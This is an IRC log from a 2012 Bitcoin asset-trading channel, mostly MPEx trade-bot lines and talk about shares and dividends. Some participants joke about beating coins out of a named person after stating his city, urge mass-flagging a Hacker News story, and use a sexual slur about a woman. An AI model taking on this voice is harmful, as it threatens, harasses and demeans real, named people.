nice rigs apparently too. Dec 09 19:56:01 mircea_popescu: cbeast? isn't he one of those animal derivetive transformers? Dec 09 19:56:14 i have no idea Dec 09 19:56:42 HOLD THE FUCKING PHONE HERE Dec 09 19:56:46 who the fuck owns nameterrific? Dec 09 19:56:50 "I don't vote on nonissues" Dec 09 19:57:00 smickles, mircea_popescu, I know one of you two fucking know this Dec 09 19:57:08 42 Dec 09 19:57:24 Diablo-D3: zt Dec 09 19:57:27 I don't Dec 09 19:57:51 isn't it the new start-up genjix was pusghing ? Dec 09 19:57:55 as in the notorious z-o-t Dec 09 19:58:06 https://news.ycombinator.com/item?id=4894376 Dec 09 19:58:08 zhoutong Dec 09 19:58:10 get hn accounts, flag. Dec 09 19:58:35 ;;ud zot Dec 09 19:58:36 http://www.urbandictionary.com/define.php?term=zot | The sound an anteater makes when sticking out its long tongue. Dec 09 19:58:50 what? Dec 09 19:58:55 I thought that was more of a troz Dec 09 19:59:02 no USENET Oracal referrence? Dec 09 19:59:11 smickles: no, you want nethack for that Dec 09 20:00:28 jeez even such as wikipedia get it Dec 09 20:00:50 [MPEX] [S.DICE] 800 @ 0.00338347 = 2.7068 BTC [-] Dec 09 20:00:51 [MPEX] [S.DICE] 470 @ 0.0033 = 1.551 BTC [-] Dec 09 20:01:00 so according to this Dec 09 20:01:09 zhoutong lives in melbourne Dec 09 20:01:15 why the fuck has no one beat coins out of him yet Dec 09 20:01:23 i did hear him claim to move down under Dec 09 20:01:49 heh it's official, twitter eats trades. Dec 09 20:03:24 mircea_popescu: I thought we already knew that Dec 09 20:03:33 its probably the maximum message limit Dec 09 20:03:33 you can only do like 100 tweets a day or some shit Dec 09 20:03:46 just wire your own irc bot up or some shit Dec 09 20:03:51 nah cause it ate the first in a 3 items line-up Dec 09 20:04:09 there was another trade in s.dice with those two, for like 8k Dec 09 20:06:09 PsychoticBoy https://bitcointalk.org/index.php?topic=129941.0 Dec 09 20:06:39 i had no idea your entire fund was worth like 100 btc. Dec 09 20:07:16 mircea_popescu: I warned you that the twitter api use rules had changed Dec 09 20:07:26 we should change the protocol Dec 09 20:07:30 srsly. Dec 09 20:08:13 http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu#Accolades Dec 09 20:09:49 which advertises mpex... Dec 09 20:10:28 i had no idea your entire fund was worth like 100 btc.<< I have only bought back 20% of 1000 shares which represent 1 BFL single so Dec 09 20:10:46 so the guy is only talking of 10% ? Dec 09 20:10:48 ABM is up at BitFunder Dec 09 20:11:02 he only owned 70 shares of that 200 Dec 09 20:11:19 so he did recieve 7.7 btc Dec 09 20:11:33 only he thinks its not enough Dec 09 20:12:31 fucking little shit Dec 09 20:13:10 so basically, bitcoin magazine is done for. Dec 09 20:13:11 I think everyone here should get hn accounts Dec 09 20:13:22 then flag that story and downvote zhoutong Dec 09 20:13:52 [MPEX] [S.DICE] 1200 @ 0.0034 = 4.08 BTC [+] Dec 09 20:14:46 what's hn again ? Dec 09 20:15:29 "Mihai never denied this. His whole point had been that his girlfriend deserves cash and/or equity because Vladimir's wife had already been paid cash/equity." Dec 09 20:15:30 hackernews? Dec 09 20:15:36 mircea_popescu: hacker news Dec 09 20:15:47 hahaha o god ty bitcoin for being here for when there's nothing on snl Dec 09 20:16:13 Diablo-D3 you're basically proposing we all get another set of btctalk accounts. ffs. Dec 09 20:16:24 mircea_popescu: no Dec 09 20:16:33 hackernews is pg's news site Dec 09 20:16:42 ie, people with lots of money read this stie Dec 09 20:17:01 trust me. people with lots of money read nothing. Dec 09 20:17:01 well, lots of money and/or access to lots of money because they run lucrative tech startups in the bay area Dec 09 20:17:10 yaya access to lots of money's cocks. Dec 09 20:17:11 mircea_popescu: you'd be surprised Dec 09 20:17:30 I know a guy who has a lot of money and finds it fun to troll irc Dec 09 20:17:54 then again, he wrote most of the code that modern ircds use (including the one you're talking on right now) Dec 09 20:17:57 so /me shrugs Dec 09 20:18:33 I know strange people. Dec 09 20:18:46 mircea_popescu: also, who the fuck is mpoe_pr? Dec 09 20:18:56 [MPEX] [S.MPOE] 4321 @ 0.00053292 = 2.3027 BTC [+] Dec 09 20:18:58 [MPEX] [S.MPOE] 7079 @ 0.00053316 = 3.7742 BTC [+] Dec 09 20:19:13 the chick that reads for me. Dec 09 20:19:21 cant she get a real accouunt? Dec 09 20:19:24 with a real name? Dec 09 20:19:32 and stop acting like a meat condom Dec 09 20:19:56 say wut ? Dec 09 20:21:23 EVERYONE, MY LORD AND MASTER, MIRCEA, DEMANDS THAT YOU THROW EGGS AT NEFARIO'S HOUSE Dec 09 20:21:24 how do you figure mpoe-pr is less "real" than diablo-d3 ? Dec 09 20:21:39 because Ive been using it since 1991 and its not named "DMC-PR" Dec 09 20:22:16 i'm pretty sure if it weren't for mpoe/mpex she wouldn't be touching that forum with a 10 foot cock. Dec 09 20:23:06 and since you dont have a ten foot cock, we'll never know Dec 09 20:25:50 meh, the bitcoin mag drama is fizzling. Dec 09 20:25:58 what shall be next week's bread ?! Dec 09 20:29:09 [MPEX] [S.MPOE] 4321 @ 0.00052569 = 2.2715 BTC [-] Dec 09 20:29:11 [MPEX] [S.MPOE] 7829 @ 0.00052556 = 4.1146 BTC [-] Dec 09 20:33:23 [MPEX] [S.MPOE] 14171 @ 0.00052556 = 7.4477 BTC [-] Dec 09 20:33:25 [MPEX] [S.MPOE] 4179 @ 0.00052472 = 2.1928 BTC [-] Dec 09 20:34:24 [MPEX] [S.MPOE] 4321 @ 0.00053312 = 2.3036 BTC [+] Dec 09 20:34:24 [MPEX] [S.MPOE] 981 @ 0.00053316 = 0.523 BTC [+] Dec 09 20:38:10 !ticker s.dice Dec 09 20:38:12 [MPEX:S.DICE] 1day: 0.0033 / 0.0033888 / 0.0034 (437077 shares, 1,481.17 BTC), 30day: 0.00308319 / 0.00333957 / 0.0034 (1711907 shares, 5,717.04 BTC) Dec 09 20:38:52 ;;ticker Dec 09 20:38:53 BTCUSD ticker | Best bid: 13.27092, Best ask: 13.27093, Bid-ask spread: 0.00001, Last trade: 13.27092, 24 hour volume: 27457.97185821, 24 hour low: 13.02100, 24 hour high: 13.53000, 24 hour vwap: 13.24630 Dec 09 20:39:09 smickles "He also charted the losses over time and used it to speculate that we may soon see a 1 million BTC loss soon." <<< too many soons Dec 09 20:39:41 >1 million btc loss Dec 09 20:39:43 so... all of it? Dec 09 20:42:24 oh lol, i need a proof reader Dec 09 20:44:31 mircea_popescu, next week's bread will be sourdough because of the sour aftertaste it will leave. Dec 09 20:44:39 heh, apparently, people who come come look at my blog, now -on average- view a second page of it as well :D Dec 09 20:45:02 Sounds like all an achievement. Dec 09 20:45:44 Also, who else was not aware BitVPS dividends seen on MPEx is split on 500k shares, not 1 million? Dec 09 20:47:13 Apparently, few others than those who received dividends know about it. Dec 09 20:47:51 Namjies: it's a quirk of the way mpex works Dec 09 20:47:56 iirc Dec 09 20:48:11 yeah. because only half the shares are actually available to issuer. Dec 09 20:48:42 [MPEX] [S.BVPS] [PAID] 500000 @ 0.00013201 = 66.00300001 BTC << i think anyone who's on irc knows about it Dec 09 20:48:51 Is it so for all issuers? Dec 09 20:49:07 yes. because shares are non-voting the owner can never sell more than half thr shares Dec 09 20:49:22 this is actually enforced by he never having more than half the shares at all. Dec 09 20:49:52 Ah. I didn't know it was forced on all issuers. Dec 09 20:49:55 yup. Dec 09 20:50:14 otherwise someone could issue 1mn shares, sell 999k or w/e and just go all vladimir Dec 09 20:50:35 SatoshiDice has only 10% issued on MPEx, not 50% tho, if I recall correctly? Dec 09 20:50:41 yes. Dec 09 20:50:50 So it can be less too. Just not over 50% Dec 09 20:50:51 woah, was that nearly a 4% dividend? Dec 09 20:50:58 4.4% Dec 09 20:51:06 smickles was a pretty huge dividend yeah. im kinda sorry i sold mine Dec 09 20:51:12 based on a price of 0.003 Dec 09 20:51:21 !ticker S.BVPS Dec 09 20:51:22 [MPEX:S.BVPS] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.00200004 / 0.00309201 / 0.00349995 (194457 shares, 601.26 BTC) Dec 09 20:51:25 price is .0034 now tho Dec 09 20:51:35 30 day avg seems a fair price point Dec 09 20:51:50 ;;calc 0.00013201 / 0.00309201 Dec 09 20:52:10 0.0426939110805 Dec 09 20:52:24 Aye Dec 09 20:52:29 er, i was looking at the s.dice price, i guess Dec 09 20:53:34 [MPEX] [S.BVPS] 1000 @ 0.003725 = 3.725 BTC [+] Dec 09 20:54:09 I guess someone wanted the remaining ask Dec 09 20:54:29 there's no asks left? Dec 09 20:54:41 and another appeared for 1.5k at 0.004 Dec 09 20:54:46 Odd Dec 09 20:55:11 I bought most asks by now. Dec 09 20:55:23 I don't see much asks. Dec 09 20:57:02 so month's output on mpex was Dec 09 20:57:21 ;;calc 216.98548119 + 401.57162897 + 66.00300001 Dec 09 20:57:22 684.56011017 Dec 09 20:57:31 like 14 blocks Dec 09 20:57:38 o no wait. reward halved. like 28 blocks Dec 09 20:57:47 Yes Dec 09 20:57:59 this not counting options of course, that's be another 2.1k Dec 09 20:58:01 [MPEX] [S.MPOE] 4321 @ 0.00052483 = 2.2678 BTC [-] Dec 09 20:58:01 [MPEX] [S.MPOE] 10879 @ 0.00052472 = 5.7084 BTC [-] Dec 09 20:59:34 ;;bc,calc 325000000 Dec 09 20:59:35 use the 'gentime' command instead Dec 09 20:59:43 ;;gentime 32500000 Dec 09 20:59:44 The average time to generate a block at 32500000.0 Mhps, given difficulty of 3438908.96016, is 7 minutes and 34 seconds Dec 09 21:00:02 ;;calc 3600*24*30 Dec 09 21:00:03 2592000 Dec 09 21:00:05 ;;calc 3600*24*30 / 28 Dec 09 21:00:08 92571.4285714 Dec 09 21:00:24 ;;gentime 325000 Dec 09 21:00:25 The average time to generate a block at 325000.0 Mhps, given difficulty of 3438908.96016, is 12 hours, 37 minutes, and 26 seconds Dec 09 21:00:56 Namjies: you have the market cornered on s.bvps then? Dec 09 21:01:03 so mpex mines with like 160Gh/s Dec 09 21:01:26 mircea_popescu: sounds like you're getting into dmc math Dec 09 21:01:37 :D Dec 09 21:01:55 I have 77% of circulating shares (175k) Dec 09 21:02:05 Assuming rg didn't sell any more. Dec 09 21:02:20 iirc rg liked the price going up Dec 09 21:02:20 So that sounds about accurate. Dec 09 21:03:34 Dr. J R Gribble, PHD Psychology Dec 09 21:03:39 http://www.everydayhealth.com/doctors/dr-j-r-gribble-phd-63246379 Dec 09 21:04:02 Whut? Dec 09 21:04:27 nanotube should claim that profile Dec 09 21:04:32 That seemed random Dec 09 21:04:37 Yes, he should Dec 09 21:04:58 http://mining.bitcoin.cz/stats/ look rg has an ad on slush's pool ?! Dec 09 21:05:38 [MPEX] [S.MPOE] 21629 @ 0.00052472 = 11.3492 BTC [-] Dec 09 21:06:29 nice Dec 09 21:07:16 RG has ads in many places I think. I thought he hosted a few well known bitcoin service and had his link place on those. Dec 09 21:07:55 I'm not sure if he pays for ads or if there's deals for them. Dec 09 21:07:55 pretty cool. didn't know about this one Dec 09 21:09:55 I always say BitVPS as a good choice on MPEx Dec 09 21:10:24 Only reason I didn't get more before was the ~6% weekly profit I was making trading on GLBSE instead. Dec 09 21:10:42 there was a passthrough anyway Dec 09 21:10:44 or was there ? Dec 09 21:10:45 yeah, lot good that did Dec 09 21:11:03 brendio did it Dec 09 21:11:33 you offered it to me, seems i was smart to decline Dec 09 21:11:44 Yes, there was. I had brendio get back my pass-through shares and transfer them to me on MPEx when I got my account. Soon after, GLBSE closed. Dec 09 21:11:53 lol lucky move. Dec 09 21:12:07 Aye Dec 09 21:14:02 jesus god will i never get this motherfucking oil sorted out Dec 09 21:14:05 gah Dec 09 21:14:41 Well luckily I didn't borrow on GLBSE at a high interest. 0.5% weekly was very high already. Sure there was large margins for trading on price differences but I was fearing a large loss was inevitable. Wasn't expecting GLBSE closing tho. Dec 09 21:15:24 heh. the mpbor is what, 10% pm Dec 09 21:17:41 mpbor? Dec 09 21:19:27 well yes ? first time you hear of it ? Dec 09 21:22:47 No, I forgot how that works however. Dec 09 21:23:15 it's the mpoe bonds settlement price Dec 09 21:23:25 acts as a sort of universal rate for a month Dec 09 21:25:04 Yes, there was interest too for balances related to that but it was abolished I believe. Probably because MPEx's capital meet the demand in full? Dec 09 21:26:44 no, mostly because there's no sane way to use the balances. Dec 09 21:27:20 as in, the entire lending of btc thing is borkt. Dec 09 21:27:41 what'd you do ?! Dec 09 21:28:05 oh you know, but it's a secret Dec 09 21:28:53 on the firm belief that a system that's not built to thrive on trolls isn't built to last. Dec 09 21:30:20 hey, i thought the mpoe statemtnets weren't behind the wall :| Dec 09 21:30:48 it's like i temp. deleted that cookie for no good reason :P Dec 09 21:31:21 too much hassle to make exclusions :D Dec 09 21:31:53 [MPEX] [S.MPOE] 18050 @ 0.00052764 = 9.5239 BTC [+] Dec 09 21:31:53 [MPEX] [S.MPOE] 11963 @ 0.00052472 = 6.2772 BTC [-] Dec 09 21:31:55 [MPEX] [S.MPOE] 6747 @ 0.00051833 = 3.4972 BTC [-] Dec 09 21:31:56 [MPEX] [S.MPOE] 517 @ 0.00051831 = 0.268 BTC [-] Dec 09 21:36:30 Aren't those statement published on bitcointalk too anyway? Dec 09 21:37:34 yup Dec 09 21:38:06 Aye Dec 09 21:38:28 Well I'll be AFK for a bit. Dec 09 21:38:57 is brendio still in hiding? I like to dump that BitVPS PT crap on him he sold to GLBSE Dec 09 21:40:38 woah Namjies is double hyphenated Dec 09 21:41:16 EskimoBob prolly Namjies wants to buy Dec 09 21:44:43 Is brendio actually gone? Dec 09 21:45:34 How much was there in that pass-through when GLBSE closed by the way? Dec 09 21:45:48 he lurks around the forum but is not answering to pm and questions. Dec 09 21:45:49 also, what do you mean, dub? Dec 09 21:46:00 Hmm... Dec 09 21:46:35 actually I think a single name has to have two hyphens Dec 09 21:46:40 ;;seen brendio Dec 09 21:46:40 brendio was last seen in #bitcoin-assets 14 weeks, 2 days, 4 hours, 40 minutes, and 39 seconds ago: *nef Dec 09 21:46:48 So mircea_popescu, how do you like that "short sell" gigamining idea? Dec 09 21:46:48 ya haven't seen much of him Dec 09 21:46:50 whereas you have one in each name Dec 09 21:47:02 if that is your real name, which it seems to be Dec 09 21:47:10 EskimoBob neither here nor there. Dec 09 21:47:17 Oh, my actual name. Dec 09 21:47:19 Yes. Dec 09 21:47:40 EskimoBob: I bought almost all of BitVPS on MPEx by now. How many shares were circulating in the pass-through? Dec 09 21:47:46 Do you have any idea? Dec 09 21:48:02 Namjies: thanks for the payout anyway Dec 09 21:48:04 50k or something ? Dec 09 21:48:07 Namjies: I do not now put this is probably in the forum Dec 09 21:48:42 my first glbse recovery Dec 09 21:48:50 There's only 39k shares left I don't own. Dec 09 21:48:55 I have few and I like to get rid of them but brendio is gone Dec 09 21:49:21 Namjies: https://bitcointalk.org/index.php?topic=87358.msg1090543#msg1090543 Dec 09 21:49:25 If he had more than that owed, I probably bought em off of him by now that means. Dec 09 21:50:33 Ah, maybe he doesn't have more than that. He might have those 39k shares I'm missing. Dec 09 21:50:51 I have a tiny fraction of those Dec 09 21:50:58 BIB.BVPS Dec 09 21:51:38 Before GLBSE closed, I had passthrough shares I had transfered to MPEx and were removed from the pass-through. Maybe others did the same. Dec 09 21:51:46 Hopefully he still have those shares. Dec 09 21:52:04 Namjies: what did the kraken pt ipo at? was it 0.1? Dec 09 21:52:04 Yes Dec 09 21:52:09 No Dec 09 21:52:09 0.01 Dec 09 21:52:15 missing one zero Dec 09 21:52:20 k, ta Dec 09 21:52:36 Had 500 BTC/50000 shares. Dec 09 21:53:11 Including over 100 BTC from me because I was keeping more deposited than I had sold so divs were always covered. Dec 09 21:53:25 looks like http://www.bitvps.com hav latest info from june. Did they go under? Dec 09 21:53:55 they just paid dividend. Dec 09 21:54:34 66 BTC / 500k shares Dec 09 21:54:57 Which means monthly profit total was ~1700 USD this month. Dec 09 21:56:39 Well, they didn't go under at all. Dec 09 21:56:57 New provider with cheaper nodes for better. Plus 24/7 support. Dec 09 21:57:17 Is what rg will be getting from his new employer apparently. Dec 09 22:00:57 [MPEX] [S.MPOE] 2500 @ 0.0005308 = 1.327 BTC [+] Dec 09 22:00:59 [MPEX] [S.MPOE] 4321 @ 0.00053284 = 2.3024 BTC [+] Dec 09 22:01:00 [MPEX] [S.MPOE] 258 @ 0.00053316 = 0.1376 BTC [+] Dec 09 22:01:01 [MPEX] [S.MPOE] 4400 @ 0.00053317 = 2.3459 BTC [+] Dec 09 22:01:02 [MPEX] [S.MPOE] 6521 @ 0.00053319 = 3.4769 BTC [+] Dec 09 22:03:30 assbot you smell Dec 09 22:04:05 Hey Roth. I see you have your eye on the bot. Dec 09 22:04:30 yea, looking good if it weren't for that smell Dec 09 22:05:37 assbot, take a shower and I'll take you out Dec 09 22:06:38 assbot, I might be able to arrange a threesome if you clean up. Dec 09 22:08:28 o look, it's a Rothgar Dec 09 22:08:31 Yeah, don't go around flirting too much. I've seen you with danieldaniel earlier. You'll get your conquests jealous! Dec 09 22:09:07 OK maybe I should take it private. Dec 09 22:10:50 https://bitcointalk.org/index.php?topic=129941.0 << do I deserve a Scammer Tag? Dec 09 22:16:54 namijes, you can do 'BUY|S.BVPS|2000' nao :p Dec 09 22:18:31 ... yeah right Dec 09 22:20:41 apparently mpex considers price above 9999 to be malformed order Dec 09 22:21:33 Well I fear the day shares will be worth over 131000 USD a piece Dec 09 22:22:00 That's like 500x the price of shares of top corporations. Dec 09 22:22:48 [MPEX] [S.MPOE] 4321 @ 0.00053292 = 2.3027 BTC [-] Dec 09 22:22:51 [MPEX] [S.MPOE] 8579 @ 0.00053319 = 4.5742 BTC [+] Dec 09 22:22:51 [MPEX] [S.MPOE] 9044 @ 0.00053328 = 4.823 BTC [+] Dec 09 22:23:01 oh, just few more rounds of quantitative easing will do Dec 09 22:24:10 PsychoticBoy: how many shares did you sell? Dec 09 22:27:07 [MPEX] [S.MPOE] 4321 @ 0.00053323 = 2.3041 BTC [-] Dec 09 22:27:07 [MPEX] [S.MPOE] 20956 @ 0.00053328 = 11.1754 BTC [+] Dec 09 22:27:08 [MPEX] [S.MPOE] 973 @ 0.00053329 = 0.5189 BTC [+] Dec 09 22:27:53 jurov huh ? Dec 09 22:28:45 How many he sold is irrelevant. 1 share = 1/1000th Dec 09 22:29:02 If he sells 1, then the person who bought it owns 1/1000th. Dec 09 22:29:31 [MPEX] [S.MPOE] 14150 @ 0.00053329 = 7.5461 BTC [+] Dec 09 22:29:48 [MPEX] [O.BTCUSD.C130T] 775 @ 0.19181095 = 148.6535 BTC [-] Dec 09 22:30:24 Namjies berkshire is something like 100k iirc Dec 09 22:31:36 a, jurov, yes, 9999.99999999 BTC is the most you can pay for a unit. Dec 09 22:31:47 "should be enough for anyone" Dec 09 22:32:30 it's not enough for precious last bvps share Dec 09 22:32:39 awell Dec 09 22:33:30 make it 640k? Dec 09 22:33:39 lol Dec 09 22:33:45 wasn't it 64k ? Dec 09 22:33:52 nono, it was 4k! Dec 09 22:34:03 whereas this is quite literally over 9 thousand. Dec 09 22:34:37 hehe, it's actually 999999999999. unless mircea uses floats Dec 09 22:35:40 like other professional futures platforms Dec 09 22:35:49 which we shan;t name Dec 09 22:36:07 mircea_popescu, I suppose there's a very low count issued. Dec 09 22:37:06 Berkshire Hathaway Inc. (BRK-A) -NYSE 131,090.00 150.00 Dec 09 22:37:11 Market Cap: 217.09B Dec 09 22:37:20 so like 1.x mn issued. Dec 09 22:37:43 fancy that it would be EXACTLY 131 Dec 09 22:40:08 and with that i'm off. have a ball everyone. Dec 09 22:40:24 MPEx would support Berkshire Hathaway prices, no higher. **** BEGIN LOGGING AT Mon Dec 10 05:55:37 2012 Dec 10 05:55:45 dub: i meant the battleship comment ;) Dec 10 05:55:53 ahh how goes! Dec 10 05:56:17 mircea_popescu: my comment on your post is my most viewed blog post Dec 10 05:56:29 hehe Dec 10 05:56:39 [MPEX] [S.MPOE] 4321 @ 0.00052338 = 2.2615 BTC [-] Dec 10 05:56:41 [MPEX] [S.MPOE] 8679 @ 0.0005232 = 4.5409 BTC [-] Dec 10 05:56:47 trilema is an old dragon Dec 10 05:57:12 it got accused of blogspam too :) Dec 10 05:57:26 and more of this http://blog.smickles.com/bitcoin/btc-is-scammed-about-as-much-as-usd/#comment-183 Dec 10 05:59:47 [MPEX] [S.MPOE] 4321 @ 0.00052321 = 2.2608 BTC [+] Dec 10 05:59:49 [MPEX] [S.MPOE] 2329 @ 0.0005232 = 1.2185 BTC [-] Dec 10 05:59:50 lol blogspam ? caus hwy ? Dec 10 06:01:37 i guess that they didn't understand I was highlighting something you said at the end of what many may consider a ;tldr Dec 10 06:02:09 ya well. part of free market is no matter what happens there'll be someone to explain why it's wrong/dangerous/etc. Dec 10 06:02:12 this isn't realyl a bad thing. Dec 10 06:03:14 http://news.ycombinator.com/item?id=4894376 Dec 10 06:03:20 mircea_popescu: also, this was funny http://www.reddit.com/r/Bitcoin/comments/14k1go/btc_is_scammed_about_as_much_as_usd/c7dvwy2 Dec 10 06:03:48 "It's really unfortunate that the link you referenced contained too many wrong understandings and misrepresentations. " Dec 10 06:03:49 lol. Dec 10 06:04:29 mircea_popescu: even better ZT to D3: "You're a credible person,..." Dec 10 06:04:36 smickles o, he's going to assume something stupid ? o noes! that hurts me SO BAD Dec 10 06:04:38 he isn't not lying Dec 10 06:05:03 but anyways : i suspect some pretty big news coming out of mpex today. Dec 10 06:05:18 :O Dec 10 06:06:41 nameterrific makes a good mpex listing, good move Dec 10 06:08:23 ;;google catfish pigeons Dec 10 06:08:24 Catfish learning to hunt pigeons on land (VIDEO) | The Sideshow ...: ; Catfish Hunt Pigeons: Fish Catch Birds On Land In Display Of ...: ; Putting the cat(fish) among the pigeons | (1 more message) Dec 10 06:08:46 yes, that is disturbing Dec 10 06:10:34 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.23552546 = 235.5255 BTC [-] Dec 10 06:10:41 [MPEX] [O.BTCUSD.C130T] 1000 @ 0.18937934 = 189.3793 BTC [-] Dec 10 06:11:08 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.29021761 = 290.2176 BTC [+] Dec 10 06:14:09 https://www.facebook.com/mircea.popescu.714 Dec 10 06:14:20 MP likes Harry Potter :D Dec 10 06:14:35 mircea looks like jerry seinfeld Dec 10 06:14:44 and is interested in converse shoes :o Dec 10 06:14:49 on his blog he looks like kramer Dec 10 06:14:58 omg who is that dood Dec 10 06:15:08 oh no, THIS is MP https://www.facebook.com/mircea.popescu.509 Dec 10 06:15:17 dude they really have 714 mp's on fb ?! Dec 10 06:15:25 the spam on that thing is really getting out of hand Dec 10 06:15:31 i don't think there actually exist 100 in the whole world. Dec 10 06:15:51 not a special fucking snowflake now Dec 10 06:16:19 http://trilema.com/2012/the-bitcoin-drama-timeline/#comment-90895 Dec 10 06:16:23 meni is butthurted. Dec 10 06:16:32 ;;isdown encyclopediabitcoinica.com Dec 10 06:16:33 Error: "isdown" is not a valid command. Dec 10 06:16:38 err Dec 10 06:16:51 ;;issucky Dec 10 06:16:51 Error: "issucky" is not a valid command. Dec 10 06:18:38 hmm, this didn't work either http://blog.smickles.com/wp-content/uploads/2012/12/DOJ.me-bug.png Dec 10 06:20:28 http://upload.wikimedia.org/wikipedia/commons/d/d4/X-Window-System.png omfg did X suck in the 90s Dec 10 06:21:25 x still looks like that Dec 10 06:22:52 at least now there's alternatives. Dec 10 06:22:58 [MPEX] [S.MPOE] 6023 @ 0.0005232 = 3.1512 BTC [-] Dec 10 06:22:59 [MPEX] [S.MPOE] 12327 @ 0.00051816 = 6.3874 BTC [-] Dec 10 06:43:52 [MPEX] [S.MPOE] 2250 @ 0.00051822 = 1.166 BTC [+] Dec 10 06:46:28 [MPEX] [S.MPOE] 2071 @ 0.00051822 = 1.0732 BTC [+] Dec 10 06:46:29 [MPEX] [S.MPOE] 1042 @ 0.00051816 = 0.5399 BTC [-] Dec 10 06:46:30 [MPEX] [S.MPOE] 18400 @ 0.00051803 = 9.5318 BTC [-] Dec 10 06:46:32 [MPEX] [S.MPOE] 7437 @ 0.00051765 = 3.8498 BTC [-] Dec 10 06:50:14 [MPEX] [S.MPOE] 9613 @ 0.00051765 = 4.9762 BTC [-] Dec 10 06:50:16 [MPEX] [S.MPOE] 4187 @ 0.0005176 = 2.1672 BTC [-] Dec 10 06:57:36 Ok who is Biggest Fish player that paid using 1Hanna? http://blockchain.info/tx/b2806ab9fb7294e792f2a42bd3aeb87d104339081174ee51f25bfa21fd84f236 Dec 10 06:57:49 Ended up winning the monthly BitLotto too. Dec 10 06:59:04 [MPEX] [S.MPOE] 3800 @ 0.00052466 = 1.9937 BTC [+] Dec 10 07:16:09 It's probably... well... Hanna... Dec 10 07:16:24 just like my address is 1Namjies Dec 10 07:17:30 [MPEX] [S.MPOE] 521 @ 0.00052466 = 0.2733 BTC [+] Dec 10 07:17:31 [MPEX] [S.MPOE] 16700 @ 0.00052498 = 8.7672 BTC [+] Dec 10 07:17:33 [MPEX] [S.MPOE] 5500 @ 0.00052528 = 2.889 BTC [+] Dec 10 07:17:34 [MPEX] [S.MPOE] 4579 @ 0.00052643 = 2.4105 BTC [+] Dec 10 07:26:20 [MPEX] [S.MPOE] 4321 @ 0.00051763 = 2.2367 BTC [-] Dec 10 07:26:21 [MPEX] [S.MPOE] 13613 @ 0.0005176 = 7.0461 BTC [-] Dec 10 07:26:23 [MPEX] [S.MPOE] 10623 @ 0.0005173 = 5.4953 BTC [-] Dec 10 07:38:12 1Namjies: Thanks. I guess I don't follow this channel close enough as the name didn't initially ring a bell. Dec 10 07:42:45 Well I haven't actually seen any Hanna. All I know is that address is not associated with any user of the otc. Dec 10 07:44:36 [MPEX] [S.MPOE] 6836 @ 0.0005173 = 3.5363 BTC [-] Dec 10 07:44:38 [MPEX] [S.MPOE] 14400 @ 0.0005172 = 7.4477 BTC [-] Dec 10 07:44:39 [MPEX] [S.MPOE] 13964 @ 0.00051713 = 7.2212 BTC [-] Dec 10 08:11:57 [MPEX] [S.MPOE] 12660 @ 0.00051848 = 6.564 BTC [+] Dec 10 08:11:58 [MPEX] [S.MPOE] 6886 @ 0.00051713 = 3.561 BTC [-] Dec 10 08:12:00 [MPEX] [S.MPOE] 8680 @ 0.00051669 = 4.4849 BTC [-] Dec 10 08:20:02 [MPEX] [S.MPOE] 1680 @ 0.00051669 = 0.868 BTC [-] Dec 10 08:20:03 [MPEX] [S.MPOE] 7900 @ 0.00051648 = 4.0802 BTC [-] Dec 10 08:20:05 [MPEX] [S.MPOE] 7400 @ 0.00051644 = 3.8217 BTC [-] Dec 10 08:20:06 [MPEX] [S.MPOE] 2615 @ 0.00051603 = 1.3494 BTC [-] Dec 10 08:22:47 just went to my first auction Dec 10 08:23:18 dude was a slippery son of a gun Dec 10 08:24:20 like literally the auctioneer was sweating so much im surprised he didnt slip over Dec 10 08:50:37 [MPEX] [S.MPOE] 20085 @ 0.00051603 = 10.3645 BTC [-] Dec 10 08:50:38 [MPEX] [S.MPOE] 9615 @ 0.00051599 = 4.9612 BTC [-] Dec 10 08:55:21 [MPEX] [S.MPOE] 3685 @ 0.00051599 = 1.9014 BTC [-] Dec 10 08:55:22 [MPEX] [S.MPOE] 9300 @ 0.00051591 = 4.798 BTC [-] Dec 10 08:55:24 [MPEX] [S.MPOE] 8501 @ 0.00051585 = 4.3852 BTC [-] Dec 10 08:59:47 [MPEX] [S.MPOE] 1649 @ 0.00051585 = 0.8506 BTC [-] Dec 10 08:59:49 [MPEX] [S.MPOE] 4151 @ 0.00051572 = 2.1408 BTC [-] Dec 10 09:06:29 [MPEX] [S.MPOE] 12093 @ 0.00051572 = 6.2366 BTC [-] Dec 10 09:06:31 [MPEX] [S.MPOE] 10016 @ 0.00051565 = 5.1648 BTC [-] Dec 10 09:07:21 [MPEX] [S.MPOE] 18234 @ 0.00051565 = 9.4024 BTC [-] Dec 10 09:07:22 [MPEX] [S.MPOE] 3066 @ 0.00051555 = 1.5807 BTC [-] Dec 10 09:08:34 [MPEX] [S.MPOE] 4321 @ 0.00051792 = 2.2379 BTC [+] Dec 10 09:08:35 [MPEX] [S.MPOE] 3801 @ 0.00051799 = 1.9689 BTC [+] Dec 10 09:23:34 [MPEX] [S.MPOE] 3900 @ 0.00051798 = 2.0201 BTC [-] Dec 10 09:31:52 [MPEX] [S.MPOE] 4321 @ 0.00051563 = 2.228 BTC [-] Dec 10 09:31:53 [MPEX] [S.MPOE] 21679 @ 0.00051555 = 11.1766 BTC [-] Dec 10 09:36:10 [MPEX] [S.MPOE] 6308 @ 0.00051555 = 3.2521 BTC [-] Dec 10 09:36:11 [MPEX] [S.MPOE] 11142 @ 0.00051535 = 5.742 BTC [-] Dec 10 09:41:36 [MPEX] [S.MPOE] 421 @ 0.00051798 = 0.2181 BTC [+] Dec 10 09:41:37 [MPEX] [S.MPOE] 18679 @ 0.00051799 = 9.6755 BTC [+] Dec 10 10:04:25 [MPEX] [S.MPOE] 4321 @ 0.00051556 = 2.2277 BTC [-] Dec 10 10:04:26 [MPEX] [S.MPOE] 20808 @ 0.00051535 = 10.7234 BTC [-] Dec 10 10:04:28 [MPEX] [S.MPOE] 14114 @ 0.00051523 = 7.272 BTC [-] Dec 10 10:07:22 [MPEX] [S.MPOE] 7600 @ 0.00051523 = 3.9157 BTC [-] Dec 10 10:10:47 [MPEX] [S.MPOE] 6838 @ 0.00051523 = 3.5231 BTC [-] Dec 10 10:10:49 [MPEX] [S.MPOE] 27103 @ 0.00051486 = 13.9543 BTC [-] Dec 10 10:18:26 [MPEX] [S.MPOE] 6447 @ 0.00051486 = 3.3193 BTC [-] Dec 10 10:18:28 [MPEX] [S.MPOE] 5053 @ 0.00051476 = 2.6011 BTC [-] Dec 10 10:21:00 [MPEX] [S.MPOE] 